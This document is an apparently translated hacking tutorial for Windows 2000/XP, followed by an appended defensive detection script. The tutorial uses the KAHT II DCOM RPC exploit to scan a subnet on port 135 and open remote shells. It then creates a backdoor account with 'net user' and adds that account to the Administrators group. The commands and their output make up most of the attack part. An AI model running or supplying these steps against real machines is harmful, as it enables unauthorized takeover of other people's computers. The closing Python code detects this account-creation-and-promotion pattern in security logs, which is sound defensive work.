Hacking Windows 2000/XP
Tools used:
-> kaht2 (win)
-> AWRC (Remote - Client)
-> Sheer nerve
-> If possible, have your partner keep you company for motivation
* Kaht2
Open a command prompt and run kaht2 like this:
C:>kaht.exe
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
C:\> kaht 192.168.1.1 192.168.1.255 --> depends on the network in use
[+] Targets: 192.168.1.2-192.168.1.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 33478
[+] Scan In Progress...
- Connecting to 192.168.1.10
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.1.12
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- OK, we are now inside the target computer (192.168.1.12)
C:\WINDOWS\system32>net user <-- list the accounts that exist on the target computer
------------------------------------------------------------ --------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net
net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\WINDOWS\system32>net user Qu4cK hello /add <-- add the login Qu4cK with the password hello on the target computer
The command completed successfully.
C:\WINDOWS\system32>net user <-- check whether the login Qu4cK now exists
------------------------------------------------------------ -----
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
Qu4cK SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
OK, the login Qu4cK now exists on the target computer. Unfortunately, it turns out we can only log in as an ordinary user, so now we add the login Qu4cK to the Administrators group.
C:\WINDOWS\system32>net localgroup Administrators Qu4cK /add
The command completed successfully.
We check once more whether the account is still an ordinary user or has become an administrator.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
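Seen from the defender's side, the two commands above (net user ... /add followed by net localgroup Administrators ... /add) leave an account-creation event and a local-group-change event in the target's Security log, provided account-management auditing is enabled. The following is an added example, not part of the original tutorial, that correlates the two; the comma-separated export format, host names and timestamps are constructed for illustration, and the event IDs are 624/636 on Windows 2000/XP and 4720/4732 on later versions.

```python
from datetime import datetime, timedelta

# Security-log event IDs: legacy (Windows 2000/XP) and Vista-and-later.
ACCOUNT_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}

# Constructed sample export (assumed format): time,host,event_id,account,group
SAMPLE_LOG = """\
2007-06-28T09:02:11,PC-10,624,Jarkom2,
2007-06-28T10:45:03,PC-12,624,Qu4cK,
2007-06-28T10:46:40,PC-12,636,Qu4cK,Administrators
2007-06-28T11:30:00,PC-12,636,Jarkom,Administrators
2007-06-29T08:00:00,PC-10,636,Jarkom2,Administrators
"""

def parse(log_text):
    """Yield (time, host, event_id, account, group) tuples from the export."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, host, event_id, account, group = line.split(",")
        yield datetime.fromisoformat(when), host, int(event_id), account, group

def find_new_admin_accounts(log_text, window=timedelta(minutes=10)):
    """Report accounts created and then put in Administrators within `window`."""
    created = {}    # (host, account) -> creation time
    findings = []
    for when, host, event_id, account, group in sorted(parse(log_text)):
        key = (host, account.lower())
        if event_id in ACCOUNT_CREATED:
            created[key] = when
        elif event_id in LOCAL_GROUP_MEMBER_ADDED and group.lower() == "administrators":
            born = created.get(key)
            # Flag only when the promotion closely follows the creation.
            if born is not None and when - born <= window:
                findings.append((host, account, born, when))
    return findings

if __name__ == "__main__":
    for host, account, born, promoted in find_new_admin_accounts(SAMPLE_LOG):
        print(f"{host}: {account} created {born}, made administrator {promoted}")
```

Only the Qu4cK account on PC-12 is reported with the default ten-minute window; an existing account being promoted, or a promotion a day after creation, is not.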